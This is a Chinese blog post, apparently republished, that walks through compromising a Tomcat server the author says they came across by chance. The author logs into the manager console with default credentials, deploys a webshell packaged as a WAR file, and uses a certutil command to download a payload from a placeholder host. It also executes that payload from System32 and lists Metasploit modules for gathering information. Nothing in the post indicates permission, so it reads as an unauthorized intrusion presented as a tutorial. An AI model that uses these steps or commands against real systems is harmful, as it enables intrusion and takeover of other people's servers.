TomCat Getshell拿服务器权限实战
2023-4-20 09:11:1 Author: 编码安全研究(查看原文) 阅读量:22 收藏

0x00 前言

无意中接触到一个网站,所以索性尝试一下,都是一些基本操作,大佬看看就可以了奥。注:由于保密问题,所有关于对方信息网址等各项信息都将保密打上马赛克,能打的都打上马赛克。

0x01 Tomcat入口

tomcat默认有个manager的管理后台app,密码存放在conf/tomcat-users.xml里面。如果tomcat是外网开放的,那么这个manager服务也是开放的,http://主机:端口/manager/html 可以看看是不是通的

首先我尝试一下默认账号admin 密码为空 发现可以进去 那真是太好了

登录进去之后

可以看到有一个上传war部署项目的,那么就用IDEA 打包一个webshell大马 部署进去即可,首先需要一个自备的webshell大马

随便找一个,然后打开IDEA创建一个项目

一直Next即可,然后把webshell拷贝到scr目录

选择Project Structure

选择Artifacts,然后再选择webApplication: Archive

打勾include in project build然后点击+号选择module Output

选择项目即可

然后选择build

选择build Artifacts

完事之后呢,上传部署即可
点击Deploy之后就可以看到

多了一个xssx,那么访问那个目录即可

命令执行 ipconfig,可以看到内网192.168.0.128,看看用户呢

0x02 权限移交MSF

尝试使用shellcode制作payload

编译后利用webshell上传到服务器,有最快捷的方法把payload上传到服务器(记得一定要内网穿透)

第一种就是使用CMD的命令certutil(然后使用CMD命令运行即可)命令:
certutil -urlcache -split -f https://www.xxx.com/test.exe
第二种就是使用webshell的上传(同理,使用CMD命令运行PAYLOAD)
使用webshell来到服务器的C:\Windows\System32\目录下,然后uploadfile

Jie.exe就是我们上传的payload,直接使用CMD运行

start C:\Windows\System32\jie.exe

内网的IP为192.168.0.128

0x03 信息搜集

1. 查看路由

2. 查看系统信息

3. 进入CMD命令行 然后Net User查看用户

4. 调用 post/windows/gather/dumplinks 来查看最近访问的文件

5. 调用 post/windows/gather/enum_applications 来查看目标主机安装软件的信息

这些都是常用的一些知识,平时一定要熟记于心的

文章来源:UzJu的安全屋

原文地址:https://uzzju.com/?id=56

注:如有侵权请联系删除

推荐阅读   

sql注入--入门到进阶

短信验证码安全常见逻辑漏洞

最全常见Web安全漏洞总结及推荐解决方案

常见的Web应用的漏洞总结(原理、危害、防御)

代码审计常见漏洞总结

Web安全漏洞的靶场演示

13 款 Linux 比较实用的工具

xss攻击、绕过最全总结

   学习更多技术,关注我:   

觉得文章不错给点个‘再看’吧。

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NDY1MDc2Mg==&mid=2247503181&idx=1&sn=0b396b2bbf9389ba0f25bce00b36454f&chksm=ce649e28f913173e88f88a00c18a6e79d4982cd80ac29d48dc35b4efc2d965001d27d87cb441#rd
如有侵权请联系:admin#unsafe.sh